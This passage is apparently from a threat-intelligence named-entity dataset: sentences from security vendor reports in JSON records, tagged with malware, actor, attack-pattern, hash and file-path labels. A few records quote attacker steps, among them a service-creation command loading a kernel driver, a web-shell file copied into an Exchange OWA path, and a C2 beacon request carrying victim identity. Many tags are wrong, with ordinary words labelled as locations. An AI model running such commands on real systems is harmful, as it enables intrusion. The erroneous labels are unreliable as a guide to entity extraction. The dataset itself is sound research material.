blog.","entities":[],"relations":[],"Comments":[]} +{"id":13540,"text":"However, since early 2020, we\u2019ve noticed some changes to Water Pamola\u2019s activity.","entities":[{"id":51609,"label":"campaign","start_offset":57,"end_offset":69},{"id":51610,"label":"TIME","start_offset":15,"end_offset":25}],"relations":[],"Comments":[]} +{"id":14121,"text":"Compile Time APT73 and Kitsune","entities":[{"id":48185,"label":"threat-actor","start_offset":13,"end_offset":18},{"id":48186,"label":"campaign","start_offset":23,"end_offset":30}],"relations":[],"Comments":[]} +{"id":8128,"text":"Meanwhile, the app invokes code from the extra DEX file to enable the installation of unknown apps and the installation of the payload app callCam.","entities":[{"id":25169,"label":"location","start_offset":99,"end_offset":102},{"id":25170,"label":"malware","start_offset":139,"end_offset":146}],"relations":[],"Comments":[]} +{"id":7539,"text":"Countermeasures and Trend Micro Solutions Users unfamiliar with the various kinds of social engineering techniques might find it difficult to distinguish a legitimate message from a malicious one \u2013 thus the need for education on identifying and mitigating phishing attacks \u2013 especially if it involves organizations in sensitive industries such as government and manufacturing.","entities":[{"id":23419,"label":"location","start_offset":16,"end_offset":19},{"id":23420,"label":"location","start_offset":26,"end_offset":31},{"id":23421,"label":"location","start_offset":192,"end_offset":195},{"id":23422,"label":"location","start_offset":241,"end_offset":244},{"id":23423,"label":"attack-pattern","start_offset":256,"end_offset":264},{"id":23424,"label":"location","start_offset":358,"end_offset":361}],"relations":[],"Comments":[]} +{"id":8794,"text":"We haven\u2019t seen any evidence of such attempts being successful.","entities":[],"relations":[],"Comments":[]} +{"id":1904,"text":"Some of these features are listed below.","entities":[],"relations":[],"Comments":[]} +{"id":2183,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} +{"id":826,"text":" We also recommend users of the Chrome browser to update to version 79.0.3945.130 as they recently released an update to fix the TLS issue. Palo Alto Networks customers running Traps are now safeguarded from the Windows CryptoAPI Spoofing vulnerability, regardless of whether they are running an unpatched Microsoft Windows 10 system.","entities":[{"id":46376,"label":"SOFTWARE","start_offset":307,"end_offset":328},{"id":46375,"label":"SOFTWARE","start_offset":213,"end_offset":230},{"id":46373,"label":"SOFTWARE","start_offset":32,"end_offset":38},{"id":46374,"label":"identity","start_offset":141,"end_offset":159}],"relations":[],"Comments":[]} +{"id":4199,"text":"Remote Services: SMB\/Windows Admin Shares Discovery T1087.002","entities":[{"id":50005,"label":"attack-pattern","start_offset":17,"end_offset":61}],"relations":[],"Comments":[]} +{"id":12776,"text":"PLEAD\u2019s installers are disguised as documents using the right-to-left-override (RTLO) technique to obfuscate the malware\u2019s filename.","entities":[{"id":39755,"label":"tools","start_offset":0,"end_offset":5},{"id":39756,"label":"location","start_offset":19,"end_offset":22}],"relations":[],"Comments":[]} +{"id":12058,"text":"The phishing kit will also ask for second-factor authentication codes sent to devices.","entities":[{"id":37314,"label":"attack-pattern","start_offset":4,"end_offset":12},{"id":37315,"label":"location","start_offset":17,"end_offset":21}],"relations":[],"Comments":[]} +{"id":1569,"text":" Bad Rabbit is a ransomware attack that, at the time of this writing, appears to primarily be affecting countries in Eastern Europe.","entities":[{"id":45059,"label":"malware","start_offset":1,"end_offset":11},{"id":45060,"label":"location","start_offset":117,"end_offset":131}],"relations":[{"id":75,"from_id":45059,"to_id":45060,"type":"targets"}],"Comments":[]} +{"id":13639,"text":" Tags Endpoints | APT & Targeted Attacks | Research | Articles, News, Reports | Cyber Threats","entities":[],"relations":[],"Comments":[]} +{"id":13499,"text":"While it offers standard mailbox copies that was likely stolen with the help of credential phishing, Void Balaur also offers copies of mailboxes that have not been interacted with \u2014 for a higher price.","entities":[{"id":51567,"label":"threat-actor","start_offset":101,"end_offset":112},{"id":51568,"label":"attack-pattern","start_offset":80,"end_offset":99}],"relations":[{"id":1104,"from_id":51567,"to_id":51568,"type":"uses"}],"Comments":[]} +{"id":4168,"text":" Figure 13. Network configuration (Left: ChiserClient","entities":[{"id":12518,"label":"malware","start_offset":45,"end_offset":57}],"relations":[],"Comments":[]} +{"id":3384,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 3195c355aa564ea66b4b37baa9547cb53dde7cf4ae7010256db92fff0bde873d flash.exe","entities":[{"id":10232,"label":"malware","start_offset":0,"end_offset":11},{"id":10233,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49035,"label":"malware","start_offset":20,"end_offset":44},{"id":49036,"label":"FILEPATH","start_offset":112,"end_offset":121}],"relations":[{"id":582,"from_id":10232,"to_id":49035,"type":"duplicate-of"},{"id":583,"from_id":49036,"to_id":10233,"type":"duplicate-of"},{"id":584,"from_id":49036,"to_id":49035,"type":"indicates"},{"id":585,"from_id":10233,"to_id":49035,"type":"indicates"}],"Comments":[]} +{"id":10739,"text":"SteganographyDaserf\u2019s infection chain accordingly evolved, as shown below.","entities":[],"relations":[],"Comments":[]} +{"id":4770,"text":"For users, Android provides safety and control over how apps and third parties can access the data from their devices.","entities":[{"id":50674,"label":"SOFTWARE","start_offset":11,"end_offset":18}],"relations":[],"Comments":[]} +{"id":11053,"text":"We received leads from the FBI that supported us in this investigation.","entities":[],"relations":[],"Comments":[]} +{"id":13627,"text":"Figure 16.","entities":[],"relations":[],"Comments":[]} +{"id":4578,"text":"In just two days, the volume observed and categorized as spam by Gmail exceeded 4,500 emails.","entities":[{"id":50429,"label":"SOFTWARE","start_offset":65,"end_offset":70}],"relations":[],"Comments":[]} +{"id":8361,"text":"pipeCommunication.Close(); }","entities":[],"relations":[],"Comments":[]} +{"id":4976,"text":"Once clicked, the link redirected the target to an attacker-owned domain that delivered the exploits before redirecting the browser to a legitimate website.","entities":[],"relations":[],"Comments":[]} +{"id":7180,"text":"On June 21, we found that the website of a Korean non-profit organization was compromised with an injected script that collected visitors\u2019 information.","entities":[],"relations":[],"Comments":[]} +{"id":3186,"text":"This step is likely designed to avoid attacking an already infected victim.","entities":[],"relations":[],"Comments":[]} +{"id":493,"text":" Figure 1: Bogus patch installer overlying malware requesting administrative permissions This interaction can install malware or malicious software on the device, grant malware full administrative privileges or lock the user out and render the device unusable. In the past successful overlay attacks were typically dependent on two conditions: However, with this particular vulnerability, these conditions are no longer required for a successful attack.","entities":[],"relations":[],"Comments":[]} +{"id":1823,"text":"We found an Avast anti-rootkit driver installed as service 'asWarPot.sys' using the command sc.exe create aswSP_ArPot2 binPath= C:\\windows\\aswArPot.sys type= kernel.","entities":[{"id":46957,"label":"FILEPATH","start_offset":60,"end_offset":72},{"id":46958,"label":"FILEPATH","start_offset":92,"end_offset":98},{"id":46959,"label":"FILEPATH","start_offset":129,"end_offset":152},{"id":46960,"label":"SOFTWARE","start_offset":12,"end_offset":37}],"relations":[{"id":279,"from_id":46960,"to_id":46957,"type":"consists-of"}],"Comments":[]} +{"id":8824,"text":"While it\u2019s less common to see DDoS attacks rather than phishing or hacking campaigns coming from government-backed threat groups, we\u2019ve seen bigger players increase their capabilities in launching large-scale attacks in recent years.","entities":[{"id":27333,"label":"attack-pattern","start_offset":55,"end_offset":63},{"id":27334,"label":"location","start_offset":197,"end_offset":202}],"relations":[],"Comments":[]} +{"id":689,"text":"RTF files will look exactly like regular Word documents ","entities":[{"id":46268,"label":"SOFTWARE","start_offset":41,"end_offset":45}],"relations":[],"Comments":[]} +{"id":3232,"text":"This file is a marker to determine if the scheduled task of the backdoor has been installed.","entities":[],"relations":[],"Comments":[]} +{"id":7986,"text":"Cookie Theft, also known as \u201cpass-the-cookie attack,\u201d is a session hijacking technique that enables access to user accounts with session cookies stored in the browser.","entities":[{"id":24762,"label":"attack-pattern","start_offset":59,"end_offset":76}],"relations":[],"Comments":[]} +{"id":12667,"text":"Activate sandbox analysis.","entities":[],"relations":[],"Comments":[]} +{"id":4955,"text":"We warn users when we suspect a government-backed threat like APT35 is targeting them.","entities":[{"id":50980,"label":"threat-actor","start_offset":62,"end_offset":67}],"relations":[],"Comments":[]} +{"id":4237,"text":"Microsoft Powerpoint presentation .png, .jpg, .jpeg Image file .pst, .ost Microsoft Outlook file .csv","entities":[],"relations":[],"Comments":[]} +{"id":1443,"text":"The only way to update an app is for the developer to sign the update with the same digital certificate originally used to publish the app.","entities":[{"id":47145,"label":"identity","start_offset":41,"end_offset":51}],"relations":[],"Comments":[]} +{"id":3699,"text":"The group also evades virtualization and sandboxes and injects malicious code into hollowed processes to dodge process-based defenses.","entities":[{"id":49498,"label":"attack-pattern","start_offset":15,"end_offset":50},{"id":49499,"label":"attack-pattern","start_offset":56,"end_offset":77}],"relations":[],"Comments":[]} +{"id":1,"text":"This post is also available in: \u65e5\u672c\u8a9e (Japanese) CTB-Locker is a well-known ransomware Trojan used by crimeware groups to encrypt files on the victim's endpoints and demand ransom payment to decrypt the files back to their original state, but most antiviruses detect it by mistake as CryptoLocker (only one vendor correctly detects it as CTB-Locker).","entities":[{"id":45800,"label":"malware","start_offset":288,"end_offset":300},{"id":45801,"label":"malware","start_offset":53,"end_offset":63},{"id":45802,"label":"malware","start_offset":342,"end_offset":352}],"relations":[],"Comments":[]} +{"id":1906,"text":" File type File extensions Document files .txt, .csv, .doc, .docx, .xls, .xlsx, .pdf WhatsApp databases .db.crypt5 to .db.crypt12 Geolocation related files .kml, .kmz, .gmx, .aqm Audio files .mp3, .opus Videos .mp4, .amr, .wmv, .3gp, Pictures .jpeg, .jpg ","entities":[{"id":47031,"label":"SOFTWARE","start_offset":86,"end_offset":94}],"relations":[],"Comments":[]} +{"id":7144,"text":"During our investigation, we found some old samples that fit in these categories but have not been reported.","entities":[],"relations":[],"Comments":[]} +{"id":10099,"text":"According to the SolarWinds SEC filing, this trojanized version was downloaded by under 18,000 customers from March to June of 2020.","entities":[],"relations":[],"Comments":[]} +{"id":1068,"text":"In particular, this means that malicious apps from websites and app stores other than Google Play can carry out overlay attacks.","entities":[{"id":46552,"label":"SOFTWARE","start_offset":86,"end_offset":98}],"relations":[],"Comments":[]} +{"id":2685,"text":" There was a bug that existed in LockBit 2.0 that allowed researchers to revert the encryption process on an MSSQL database.","entities":[{"id":47894,"label":"SOFTWARE","start_offset":109,"end_offset":114},{"id":45657,"label":"threat-actor","start_offset":32,"end_offset":44}],"relations":[],"Comments":[]} +{"id":6435,"text":"The phishing emails and lure documents contain embedded URLs linking to a legitimate file-sharing service to distribute archives containing the ScreenConnect remote administrator tool.","entities":[{"id":20029,"label":"attack-pattern","start_offset":4,"end_offset":12},{"id":20030,"label":"location","start_offset":20,"end_offset":23},{"id":20031,"label":"location","start_offset":24,"end_offset":28},{"id":20033,"label":"location","start_offset":158,"end_offset":164},{"id":20034,"label":"location","start_offset":179,"end_offset":183}],"relations":[],"Comments":[]} +{"id":6013,"text":"In mid-March, a security researcher released a blog post detailing a 'Browser in the Browser' phishing technique.","entities":[{"id":18557,"label":"location","start_offset":16,"end_offset":24},{"id":18558,"label":"location","start_offset":52,"end_offset":56},{"id":18559,"label":"attack-pattern","start_offset":94,"end_offset":102}],"relations":[],"Comments":[]} +{"id":13116,"text":"Marketplaces like the one offered by AWS make it a lot easier to get the right security tools in the hands of those that need them most.","entities":[{"id":48901,"label":"SOFTWARE","start_offset":37,"end_offset":41}],"relations":[],"Comments":[]} +{"id":13728,"text":"The evidence is that Waterbear frequently uses internal IPs as its own C&C servers (for instance, b9f3a3b9452a396c3ba0ce4a644dd2b7f494905e820e7b1c6dca2fdcce069361 uses an internal IP address of 10[.]0[.]0[.]211 as its C&C server).","entities":[{"id":42688,"label":"SHA2","start_offset":98,"end_offset":162},{"id":42689,"label":"IPV4","start_offset":194,"end_offset":210}],"relations":[],"Comments":[]} +{"id":11516,"text":"They also conduct corporate espionage, handily obscuring their clients\u2019 role.","entities":[],"relations":[],"Comments":[]} +{"id":9476,"text":"RemoteModuleCommandPacket","entities":[],"relations":[],"Comments":[]} +{"id":13628,"text":"XOR routine that encrypts C&C communication Figure 17.","entities":[],"relations":[],"Comments":[]} +{"id":3473,"text":"The C&C server will send Protux to the victim\u2019s host and execute it.","entities":[{"id":49272,"label":"malware","start_offset":25,"end_offset":31}],"relations":[],"Comments":[]} +{"id":14115,"text":"It is fair to assume that the developers work on daily working times.","entities":[],"relations":[],"Comments":[]} +{"id":3348,"text":"The Cobalt Strike loader, which has a PDB string \u201cC:\\Users\\test\\Desktop\\fishmaster\\x64\\Release\\fishmaster.pdb\u201d, connects to the C&C server \u201cdownload[.]google-images[.]ml\u201d.","entities":[{"id":48959,"label":"tools","start_offset":4,"end_offset":17},{"id":48960,"label":"FILEPATH","start_offset":50,"end_offset":109},{"id":48961,"label":"DOMAIN","start_offset":140,"end_offset":169}],"relations":[{"id":511,"from_id":48960,"to_id":48959,"type":"indicates"},{"id":514,"from_id":48959,"to_id":48961,"type":"beacons-to"}],"Comments":[]} +{"id":4043,"text":"The command for execution is shown as here: > Nerapack.exe {base64 encoded key}","entities":[{"id":49894,"label":"FILEPATH","start_offset":46,"end_offset":58}],"relations":[],"Comments":[]} +{"id":2901,"text":"= this.m_rawLen;","entities":[],"relations":[],"Comments":[]} +{"id":2815,"text":"WanaCrypt0r v 1.0 was first reported a few months ago but did not include the worm capability associated with this attack.","entities":[{"id":48032,"label":"malware","start_offset":0,"end_offset":17}],"relations":[],"Comments":[]} +{"id":3145,"text":"AWS starts with the customer and works backwards.","entities":[{"id":48267,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} +{"id":11332,"text":"GET http:\/\/{C2}\/Index.php?vubc={identity} HTTP\/1.1","entities":[{"id":34614,"label":"URL","start_offset":4,"end_offset":40}],"relations":[],"Comments":[]} +{"id":13612,"text":"After extracting the content of the Adob.dll zip archive, two legitimate and signed executable files are present and executed, and a similar sideloading process happens once more.","entities":[{"id":51701,"label":"FILEPATH","start_offset":36,"end_offset":45}],"relations":[],"Comments":[]} +{"id":7697,"text":"Encrypted string We observed that some of the samples still had errors in the cipher routine.","entities":[],"relations":[],"Comments":[]} +{"id":2911,"text":"The many similarities between these exploits lead us to believe they were written by the same actor or group.","entities":[],"relations":[],"Comments":[]} +{"id":13577,"text":"The script to create and delete fake login form for credential phishing The other approach involves showing an authorization error message and then redirecting the user to a phishing website that asks users to enter their credentials.","entities":[{"id":51659,"label":"attack-pattern","start_offset":178,"end_offset":186},{"id":51658,"label":"attack-pattern","start_offset":52,"end_offset":71}],"relations":[],"Comments":[]} +{"id":114,"text":"From there, you can work backwards to develop your strategy for protecting those initial access areas tied to the different attacks.","entities":[],"relations":[],"Comments":[]} +{"id":13688,"text":"The email in question is an invoice request that has a legitimate email header, which is a known tactic used in BEC scams.","entities":[{"id":51753,"label":"attack-pattern","start_offset":112,"end_offset":121}],"relations":[],"Comments":[]} +{"id":752,"text":"This mechanism prevents precise control of the data of a freed object from further exploitation.","entities":[],"relations":[],"Comments":[]} +{"id":3214,"text":"At the time of our research into this threat, only the \u201cprint(1)\u201d command is able to be executed.","entities":[],"relations":[],"Comments":[]} +{"id":14365,"text":"Countermeasures","entities":[],"relations":[],"Comments":[]} +{"id":1511,"text":" There exist two embedded zlib-encrypted blocks at file offset 0x8C0C0 and 0xE6B40 respectively.","entities":[{"id":4493,"label":"tools","start_offset":26,"end_offset":30}],"relations":[],"Comments":[]} +{"id":6822,"text":"Trend Micro\u2122 Hosted Email Securityis a no-maintenance cloud solution that delivers continuously updated protection to stop spam, malware, spear phishing, ransomware, and advanced targeted attacks before they reach the network.","entities":[{"id":21211,"label":"location","start_offset":54,"end_offset":59},{"id":21212,"label":"location","start_offset":104,"end_offset":114},{"id":21213,"label":"malware","start_offset":118,"end_offset":122},{"id":21214,"label":"attack-pattern","start_offset":138,"end_offset":152},{"id":21215,"label":"location","start_offset":166,"end_offset":169}],"relations":[],"Comments":[]} +{"id":2027,"text":"While the obfuscation and execution may differ between the two, both samples contain very similar core functionality, due to the author copying the leaked Babuk\/Babyk source code in order to develop the HelloXD ransomware (Figure 7).","entities":[{"id":47122,"label":"malware","start_offset":203,"end_offset":210},{"id":47121,"label":"malware","start_offset":161,"end_offset":166},{"id":47120,"label":"malware","start_offset":155,"end_offset":160}],"relations":[{"id":303,"from_id":47121,"to_id":47122,"type":"variant-of"},{"id":304,"from_id":47120,"to_id":47122,"type":"variant-of"}],"Comments":[]} +{"id":4607,"text":" Using the Trend Micro Vision One Workbench, you can easily see what threats were detected, attack techniques, and a prioritized list of risky devices and users.","entities":[{"id":50508,"label":"SOFTWARE","start_offset":11,"end_offset":43}],"relations":[],"Comments":[]} +{"id":3279,"text":"The malicious actor can then connect to the relevant RTMP address to watch the streaming.","entities":[],"relations":[],"Comments":[]} +{"id":10341,"text":"Figure 3.","entities":[],"relations":[],"Comments":[]} +{"id":7331,"text":"nha","entities":[],"relations":[],"Comments":[]} +{"id":3690,"text":"To elevate privileges, the groups bypass Windows User Account Control (UAC) mechanisms, new services, and valid accounts to elevate process privileges.","entities":[{"id":49482,"label":"attack-pattern","start_offset":34,"end_offset":75}],"relations":[],"Comments":[]} +{"id":14396,"text":"In the game of measure-countermeasure that is cybersecurity today and tomorrow, XDR is the next evolutionary step in dealing with more evasive threats.","entities":[{"id":51774,"label":"SOFTWARE","start_offset":80,"end_offset":83}],"relations":[],"Comments":[]} +{"id":4779,"text":"Finally, we also offer the leading tools to protect important civil society actors such as journalists, human rights workers, opposition party politicians, and campaign organizations \u2013 in other words, the users who are frequently targeted by surveillance tools.","entities":[],"relations":[],"Comments":[]} +{"id":107,"text":"This use of known, legitimate tools is not new; we call that \u201cliving off the land\u201d and have seen this tactic pick up recently, including usage by ransomware actors.","entities":[{"id":45838,"label":"tools","start_offset":62,"end_offset":81}],"relations":[],"Comments":[]} +{"id":8254,"text":"DiscoveryOur first inkling of this threat came when we spotted a spear-phishing email campaign targeting several embassies of various European countries.","entities":[{"id":25489,"label":"location","start_offset":65,"end_offset":70},{"id":25490,"label":"attack-pattern","start_offset":71,"end_offset":79},{"id":25491,"label":"location","start_offset":86,"end_offset":94}],"relations":[],"Comments":[]} +{"id":3137,"text":"Attackers use them to take down websites for several reasons: About Threat Briefs are meant to help busy people understand real-world threats and how they can prevent them in their lives.","entities":[],"relations":[],"Comments":[]} +{"id":4233,"text":"After impersonating a fake victim of interest, we obtained a second stage payload (Detected as TROJ_DELF.XXWZ), which is a filestealer based on the Delphi programming language similar to the \u201csvctrls\u201d malware described in our previous blogpost.","entities":[{"id":50043,"label":"malware","start_offset":95,"end_offset":109}],"relations":[],"Comments":[]} +{"id":3004,"text":"All apps like those from Netflix, Amazon, Hulu and others have their own passwords to connect to their service, and attackers crack and sell compromised accounts to these services.","entities":[{"id":48120,"label":"SOFTWARE","start_offset":34,"end_offset":40},{"id":48119,"label":"SOFTWARE","start_offset":25,"end_offset":32},{"id":48121,"label":"SOFTWARE","start_offset":42,"end_offset":46}],"relations":[],"Comments":[]} +{"id":4088,"text":"While the Windows service \u201cIKEEXT\u201d is starting, the fake wlbsctrl.dll is loaded and executed with high privilege.","entities":[],"relations":[],"Comments":[]} +{"id":3532,"text":"Its apparent staying power stems from the furtive ways with which its attacks can evade traditional security solutions.","entities":[],"relations":[],"Comments":[]} +{"id":1693,"text":"Security awareness is critical to avoid falling victim to such an attack.","entities":[],"relations":[],"Comments":[]} +{"id":2207,"text":" In total, the following 14 functions are loaded during runtime: ","entities":[],"relations":[],"Comments":[]} +{"id":2999,"text":"When we think about home entertainment, there\u2019s really two things you need to think about with security.","entities":[],"relations":[],"Comments":[]} +{"id":2825,"text":"One thing reports have indicated that make this attack unique is a \u201ckillswitch\u201d capability built into the malware.","entities":[],"relations":[],"Comments":[]} +{"id":3728,"text":" Tags Endpoints | APT & Targeted Attacks | Research | Articles, News, Reports","entities":[],"relations":[],"Comments":[]} +{"id":7128,"text":"We found three new samples of the Type 1 malware family that abuses Dropbox as a secondary C&C channel, which we described in our Operation DRBControl whitepaper.","entities":[{"id":22294,"label":"location","start_offset":34,"end_offset":38},{"id":22295,"label":"malware","start_offset":68,"end_offset":75}],"relations":[],"Comments":[]} +{"id":1138,"text":" However, this particular mutex was associated with only a recent subset of the Allaple family.","entities":[{"id":46572,"label":"malware","start_offset":80,"end_offset":87}],"relations":[],"Comments":[]} +{"id":10946,"text":" SHA256 Description","entities":[],"relations":[],"Comments":[]} +{"id":7536,"text":"For the PowerShell script, the first part contains a variable named dragon_middle, which is an array containing a few hundred URLs ending with connection.php that serve as proxies between victim and C&C.","entities":[{"id":23403,"label":"attack-pattern","start_offset":8,"end_offset":18},{"id":23406,"label":"location","start_offset":180,"end_offset":187},{"id":23407,"label":"location","start_offset":195,"end_offset":198}],"relations":[],"Comments":[]} +{"id":1191,"text":"However, an increasingly popular method uses premium SMS.","entities":[],"relations":[],"Comments":[]} +{"id":9916,"text":"simsoshop.com","entities":[],"relations":[],"Comments":[]} +{"id":13916,"text":"It also uses this information to determine the amount of ransom to demand, with a typical ransom demand amounting to anywhere between US$200,000 and US$2 million.","entities":[],"relations":[],"Comments":[]} +{"id":13044,"text":"Delivered as part of its industry-leading platform, Cloud One \u2013 Application Security provides code-level visibility and protection against the latest cyber threats.","entities":[],"relations":[],"Comments":[]} +{"id":4536,"text":"We welcome recent steps taken by the government in applying sanctions to the NSO Group and Candiru, and we believe other governments should consider expanding these restrictions.","entities":[{"id":50330,"label":"threat-actor","start_offset":77,"end_offset":86},{"id":50331,"label":"threat-actor","start_offset":91,"end_offset":98}],"relations":[],"Comments":[]} +{"id":10756,"text":"Snapshots of Daserf\u2019s steganographic code generated by their toolkit MitigationSteganography is a particularly useful technique in purposeful cyberattacks: the longer their malicious activities stay undetected, the more they can steal and exfiltrate data.","entities":[{"id":32875,"label":"tools","start_offset":13,"end_offset":19},{"id":32876,"label":"location","start_offset":225,"end_offset":228},{"id":32877,"label":"location","start_offset":235,"end_offset":238}],"relations":[],"Comments":[]} +{"id":1498,"text":"The terms remote administration tool (RAT) and trojan downloader are often used synonymously with such implants.","entities":[],"relations":[],"Comments":[]} +{"id":13987,"text":"XDR fills in those gaps.","entities":[{"id":48777,"label":"SOFTWARE","start_offset":0,"end_offset":4}],"relations":[],"Comments":[]} +{"id":6014,"text":"While TAG has previously observed this technique being used by multiple government-backed actors, the media picked up on this blog post, publishing several stories highlighting this phishing capability.","entities":[{"id":18560,"label":"location","start_offset":102,"end_offset":107},{"id":18561,"label":"location","start_offset":131,"end_offset":135},{"id":18562,"label":"attack-pattern","start_offset":182,"end_offset":190}],"relations":[],"Comments":[]} +{"id":1777,"text":"One such module leverages the fact that the length of a vector object is always consistent with memory allocation, which means we can deduce the memory usage from the sum of the length of all allocated vectors.","entities":[],"relations":[],"Comments":[]} +{"id":14150,"text":"Gone are the days in which these attacks only target the endpoint, and as such, an expanded connected threat defense is paramount.","entities":[],"relations":[],"Comments":[]} +{"id":11396,"text":"In December 2021, we released research about novel techniques used by NSO Group to compromise iMessage users.","entities":[],"relations":[],"Comments":[]} +{"id":795,"text":"Time will tell.","entities":[],"relations":[],"Comments":[]} +{"id":5058,"text":"These campaigns were sent using newly created Gmail accounts to non-Google accounts, so the success rate of these campaigns is unknown.","entities":[{"id":51163,"label":"SOFTWARE","start_offset":46,"end_offset":51}],"relations":[],"Comments":[]} +{"id":2043,"text":"Querying VirusTotal with this string led to the discovery of eight files, six of which could be directly attributed to x4k through their own VirusTotal graph mapping out their infrastructure.","entities":[{"id":45229,"label":"SOFTWARE","start_offset":9,"end_offset":19},{"id":45230,"label":"threat-actor","start_offset":119,"end_offset":122},{"id":45231,"label":"SOFTWARE","start_offset":141,"end_offset":151}],"relations":[],"Comments":[]} +{"id":2730,"text":"Upgrade Cortex XDR and Traps agents for protection against this vulnerability regardless of whether your systems have installed the relevant security update from Microsoft.","entities":[{"id":45677,"label":"SOFTWARE","start_offset":8,"end_offset":18},{"id":45678,"label":"identity","start_offset":162,"end_offset":171}],"relations":[],"Comments":[]} +{"id":2760,"text":"The good news is that this vulnerability was disclosed responsibly and patches are available for most platforms on the day of the public disclosure.","entities":[],"relations":[],"Comments":[]} +{"id":635,"text":" After the system is compromised the victim is asked to send US $300 in Bitcoin to a specific Bitcoin address and then send an e-mail with the victim\u2019s bitcoin wallet ID to wowsmith123456@posteo[.]net to retrieve their individual decryption key.","entities":[{"id":46226,"label":"SOFTWARE","start_offset":94,"end_offset":101},{"id":46224,"label":"EMAIL","start_offset":173,"end_offset":200},{"id":46225,"label":"SOFTWARE","start_offset":72,"end_offset":79}],"relations":[],"Comments":[]} +{"id":13180,"text":" The decoy file first drops a flash_en.inf DLL file, which is a USBferry loader, and tries to load the encrypted USBferry malware","entities":[{"id":41126,"label":"location","start_offset":5,"end_offset":10},{"id":41127,"label":"tools","start_offset":64,"end_offset":72},{"id":41128,"label":"location","start_offset":81,"end_offset":84},{"id":41129,"label":"location","start_offset":94,"end_offset":98},{"id":41130,"label":"malware","start_offset":113,"end_offset":121}],"relations":[],"Comments":[]} +{"id":14330,"text":"Figure 17.","entities":[],"relations":[],"Comments":[]} +{"id":9917,"text":"6\/2\/16","entities":[],"relations":[],"Comments":[]} +{"id":13472,"text":"We continue to see attacks from groups like Charming Kitten on medical and healthcare professionals, including World Health Organization (WHO) employees.","entities":[{"id":51544,"label":"threat-actor","start_offset":44,"end_offset":59},{"id":51545,"label":"identity","start_offset":111,"end_offset":142}],"relations":[{"id":1101,"from_id":51544,"to_id":51545,"type":"targets"}],"Comments":[]} +{"id":12341,"text":"We haven\u2019t seen any evidence of such attempts being successful.","entities":[],"relations":[],"Comments":[]} +{"id":2251,"text":"The following commands are supported: Once again, using the previous example, the malware will first ensure that the command was not previously parsed\/executed.","entities":[],"relations":[],"Comments":[]} +{"id":13805,"text":"If yes, it modifies the process ID, which should open on another Windows Service PID.","entities":[],"relations":[],"Comments":[]} +{"id":1127,"text":" Full automation is always the ideal but it isn\u2019t always necessary.","entities":[],"relations":[],"Comments":[]} +{"id":11966,"text":"We terminated 123 YouTube channels as part of our investigation into coordinated influence operations linked to Russia.","entities":[],"relations":[],"Comments":[]} +{"id":14157,"text":"The X could be network data, email or web data, data from cloud instances, and others.","entities":[],"relations":[],"Comments":[]} +{"id":3314,"text":"Additional Findings on BIOPASS RAT ","entities":[{"id":10040,"label":"malware","start_offset":23,"end_offset":34}],"relations":[],"Comments":[]} +{"id":6243,"text":"Based on the number of \u201clikes\u201d the malware had generated, Faghani estimated that over 100,000 users had been infected with the malware.","entities":[],"relations":[],"Comments":[]} +{"id":3936,"text":"copy premium.aspx \"\\\\{hostname}\\d$\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\15.1.2044\\scripts\\premium","entities":[{"id":49778,"label":"FILEPATH","start_offset":19,"end_offset":132},{"id":49779,"label":"FILEPATH","start_offset":5,"end_offset":17}],"relations":[],"Comments":[]} +{"id":14348,"text":"The next variant appeared quickly, and it added the following abilities to its routines: Steal information about the device\u2019s clipboard, phone number, installed app list, and accounts.","entities":[],"relations":[],"Comments":[]} +{"id":14064,"text":" Another surprising similarity in the TTPs related to both campaigns is the path pointing to \u201cudel_ok.ipp,\u201d as shown in Figure 7.","entities":[{"id":47241,"label":"FILEPATH","start_offset":93,"end_offset":107}],"relations":[],"Comments":[]} +{"id":5815,"text":"So cyber is still critical as we become more hyper-connected.","entities":[],"relations":[],"Comments":[]} +{"id":4451,"text":"TAG actively monitors threat actors and the evolution of their tactics and techniques.","entities":[{"id":50228,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} +{"id":607,"text":" To do this, they make the spam look like something that requires you to click and download something like and invoice, a message, or a delivery notification.","entities":[],"relations":[],"Comments":[]} +{"id":5432,"text":"It\u2019s also important to set reminders to check if devices such as routers, cameras, network-attached storage (NAS) devices, and other IoT devices have been patched or otherwise.","entities":[],"relations":[],"Comments":[]} +{"id":11496,"text":"The Sandworm campaign used compromised government accounts to send links to Microsoft Office documents hosted on compromised domains, primarily targeting media organizations in Ukraine.","entities":[{"id":35161,"label":"threat-actor","start_offset":4,"end_offset":12},{"id":35162,"label":"location","start_offset":13,"end_offset":21},{"id":35164,"label":"location","start_offset":154,"end_offset":159}],"relations":[],"Comments":[]} +{"id":9455,"text":"Stage 3: BasicLoader","entities":[],"relations":[],"Comments":[]} +{"id":1709,"text":"CryptoWall is one of multiple ransomware families that generated income for the attacker by encrypting files on the infected PC with a private key that is in the control of the attacker.","entities":[{"id":5075,"label":"malware","start_offset":0,"end_offset":10}],"relations":[],"Comments":[]} +{"id":12566,"text":"In contrast, a 0-day is a vulnerability with no available patch which makes it harder to defend against.","entities":[],"relations":[],"Comments":[]} +{"id":11754,"text":"During the pandemic, we also uncovered attackers posing as news providers with a \u201cCovid19 news software.\u201d","entities":[],"relations":[],"Comments":[]} +{"id":11337,"text":"The browser then navigates to Gmail to begin the data collection.","entities":[],"relations":[],"Comments":[]} +{"id":14131,"text":"The \u201cX\u201d axis represents the hour of the day (in 24 hours).","entities":[],"relations":[],"Comments":[]} +{"id":2157,"text":"Then the code loops through the files within a .rar archive looking for a CAB file (TVNDRgAAAA base64 decodes to MSCF, which is the magic header of a CAB file).","entities":[],"relations":[],"Comments":[]} +{"id":3694,"text":"After a series of malicious behavior, attackers need to remain stealthy and undetected by using security solutions that can remove threats out of the system.","entities":[],"relations":[],"Comments":[]} +{"id":5397,"text":"This is in line with the increasing number of brute-force attacks performed by other APT groups such as Pawn Storm, a group that has compromised numerous assets like email addresses and email servers of targets that are typically not aligned with Pawn Storm\u2019s objectives.","entities":[{"id":51395,"label":"threat-actor","start_offset":104,"end_offset":114},{"id":51396,"label":"threat-actor","start_offset":247,"end_offset":257}],"relations":[],"Comments":[]} +{"id":235,"text":"We detected 11,637 cybersquatting newly registered domains (NRDs) during February and 